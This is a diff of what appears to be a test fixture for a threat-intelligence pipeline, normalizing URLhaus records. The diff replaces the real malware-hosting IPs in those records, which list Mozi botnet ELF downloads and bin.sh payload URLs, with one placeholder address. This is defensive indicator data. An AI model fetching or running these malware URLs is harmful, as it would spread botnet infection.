@@ -26198,18 +26198,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://115.56.31.76:45117/bin.sh",
+ "original": "http://89.160.20.156:45117/bin.sh",
 "scheme": "http",
 "port": 45117,
- "domain": "115.56.31.76",
- "full": "http://115.56.31.76:45117/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45117/bin.sh"
 },
- "ip": "115.56.31.76"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694517457Z",
- "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://115.56.31.76:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"115.56.31.76\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.028455600Z",
+ "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://89.160.20.156:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26247,18 +26247,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://49.68.80.149:41485/Mozi.a",
+ "original": "http://89.160.20.156:41485/Mozi.a",
 "scheme": "http",
 "port": 41485,
- "domain": "49.68.80.149",
- "full": "http://49.68.80.149:41485/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41485/Mozi.a"
 },
- "ip": "49.68.80.149"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694521094Z",
- "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://49.68.80.149:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"49.68.80.149\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028462600Z",
+ "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://89.160.20.156:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26296,18 +26296,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.52.164.52:43851/Mozi.m",
+ "original": "http://89.160.20.156:43851/Mozi.m",
 "scheme": "http",
 "port": 43851,
- "domain": "61.52.164.52",
- "full": "http://61.52.164.52:43851/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43851/Mozi.m"
 },
- "ip": "61.52.164.52"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694524531Z",
- "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://61.52.164.52:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.164.52\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028470100Z",
+ "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://89.160.20.156:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26345,18 +26345,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.95.174.179:37095/Mozi.m",
+ "original": "http://89.160.20.156:37095/Mozi.m",
 "scheme": "http",
 "port": 37095,
- "domain": "59.95.174.179",
- "full": "http://59.95.174.179:37095/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37095/Mozi.m"
 },
- "ip": "59.95.174.179"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694527947Z",
- "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://59.95.174.179:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.95.174.179\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028477500Z",
+ "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://89.160.20.156:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26394,18 +26394,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://58.249.18.32:59275/Mozi.m",
+ "original": "http://89.160.20.156:59275/Mozi.m",
 "scheme": "http",
 "port": 59275,
- "domain": "58.249.18.32",
- "full": "http://58.249.18.32:59275/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59275/Mozi.m"
 },
- "ip": "58.249.18.32"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694531654Z",
- "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://58.249.18.32:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.18.32\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028484500Z",
+ "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://89.160.20.156:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26443,18 +26443,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://83.224.148.209:46131/Mozi.m",
+ "original": "http://89.160.20.156:46131/Mozi.m",
 "scheme": "http",
 "port": 46131,
- "domain": "83.224.148.209",
- "full": "http://83.224.148.209:46131/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46131/Mozi.m"
 },
- "ip": "83.224.148.209"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694534910Z",
- "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://83.224.148.209:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"83.224.148.209\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028491400Z",
+ "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://89.160.20.156:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26492,18 +26492,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.99.93.203:40129/Mozi.m",
+ "original": "http://89.160.20.156:40129/Mozi.m",
 "scheme": "http",
 "port": 40129,
- "domain": "59.99.93.203",
- "full": "http://59.99.93.203:40129/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40129/Mozi.m"
 },
- "ip": "59.99.93.203"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694538627Z",
- "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://59.99.93.203:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.93.203\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028498300Z",
+ "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://89.160.20.156:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26541,18 +26541,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://27.204.253.74:43924/Mozi.m",
+ "original": "http://89.160.20.156:43924/Mozi.m",
 "scheme": "http",
 "port": 43924,
- "domain": "27.204.253.74",
- "full": "http://27.204.253.74:43924/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43924/Mozi.m"
 },
- "ip": "27.204.253.74"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694541923Z",
- "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://27.204.253.74:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.204.253.74\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028505200Z",
+ "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://89.160.20.156:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26590,18 +26590,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://117.247.202.55:38851/i",
+ "original": "http://89.160.20.156:38851/i",
 "scheme": "http",
 "port": 38851,
- "domain": "117.247.202.55",
- "full": "http://117.247.202.55:38851/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38851/i"
 },
- "ip": "117.247.202.55"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694545240Z",
- "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://117.247.202.55:38851/i\",\"url_status\":\"offline\",\"host\":\"117.247.202.55\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.028512200Z",
+ "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://89.160.20.156:38851/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26639,18 +26639,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.44.13.139:33008/Mozi.m",
+ "original": "http://89.160.20.156:33008/Mozi.m",
 "scheme": "http",
 "port": 33008,
- "domain": "125.44.13.139",
- "full": "http://125.44.13.139:33008/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33008/Mozi.m"
 },
- "ip": "125.44.13.139"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694548456Z",
- "original": "{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://125.44.13.139:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.44.13.139\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028519100Z",
+ "original": "{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://89.160.20.156:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26688,18 +26688,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.46.165.217:60201/Mozi.m",
+ "original": "http://89.160.20.156:60201/Mozi.m",
 "scheme": "http",
 "port": 60201,
- "domain": "125.46.165.217",
- "full": "http://125.46.165.217:60201/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60201/Mozi.m"
 },
- "ip": "125.46.165.217"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694552313Z",
- "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://125.46.165.217:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.165.217\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028526500Z",
+ "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://89.160.20.156:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26737,18 +26737,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.119.116.38:41479/Mozi.m",
+ "original": "http://89.160.20.156:41479/Mozi.m",
 "scheme": "http",
 "port": 41479,
- "domain": "182.119.116.38",
- "full": "http://182.119.116.38:41479/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41479/Mozi.m"
 },
- "ip": "182.119.116.38"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694555529Z",
- "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://182.119.116.38:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.116.38\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028533600Z",
+ "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://89.160.20.156:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26786,18 +26786,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.228.41.177:52003/Mozi.m",
+ "original": "http://89.160.20.156:52003/Mozi.m",
 "scheme": "http",
 "port": 52003,
- "domain": "42.228.41.177",
- "full": "http://42.228.41.177:52003/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52003/Mozi.m"
 },
- "ip": "42.228.41.177"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694559556Z",
- "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://42.228.41.177:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.41.177\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028541300Z",
+ "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://89.160.20.156:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26835,18 +26835,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.222.170.18:39500/Mozi.m",
+ "original": "http://89.160.20.156:39500/Mozi.m",
 "scheme": "http",
 "port": 39500,
- "domain": "117.222.170.18",
- "full": "http://117.222.170.18:39500/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:39500/Mozi.m"
 },
- "ip": "117.222.170.18"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.694563153Z",
- "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://117.222.170.18:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.170.18\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.028548900Z",
+ "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://89.160.20.156:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -26884,18 +26884,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.165.141:36966/Mozi.m", + "original": "http://89.160.20.156:36966/Mozi.m", "scheme": "http", "port": 36966, - "domain": "115.58.165.141", - "full": "http://115.58.165.141:36966/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36966/Mozi.m" }, - "ip": "115.58.165.141" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694566520Z", - "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://115.58.165.141:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.165.141\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028657800Z", + "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://89.160.20.156:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26933,18 +26933,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.206.204:59875/Mozi.m", + "original": "http://89.160.20.156:59875/Mozi.m", "scheme": "http", "port": 59875, - "domain": "117.247.206.204", - "full": "http://117.247.206.204:59875/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59875/Mozi.m" }, - "ip": "117.247.206.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694569846Z", - "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://117.247.206.204:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.206.204\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028664600Z", + "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://89.160.20.156:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26982,18 +26982,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.171.220:44123/Mozi.m", + "original": "http://89.160.20.156:44123/Mozi.m", "scheme": "http", "port": 44123, - "domain": "117.222.171.220", - "full": "http://117.222.171.220:44123/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44123/Mozi.m" }, - "ip": "117.222.171.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694573432Z", - "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://117.222.171.220:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.171.220\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028671900Z", + "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://89.160.20.156:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27031,18 +27031,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.194.163.151:45224/Mozi.a", + "original": "http://89.160.20.156:45224/Mozi.a", "scheme": "http", "port": 45224, - "domain": "117.194.163.151", - "full": "http://117.194.163.151:45224/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45224/Mozi.a" }, - "ip": "117.194.163.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694576618Z", - "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://117.194.163.151:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.194.163.151\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028678400Z", + "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://89.160.20.156:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
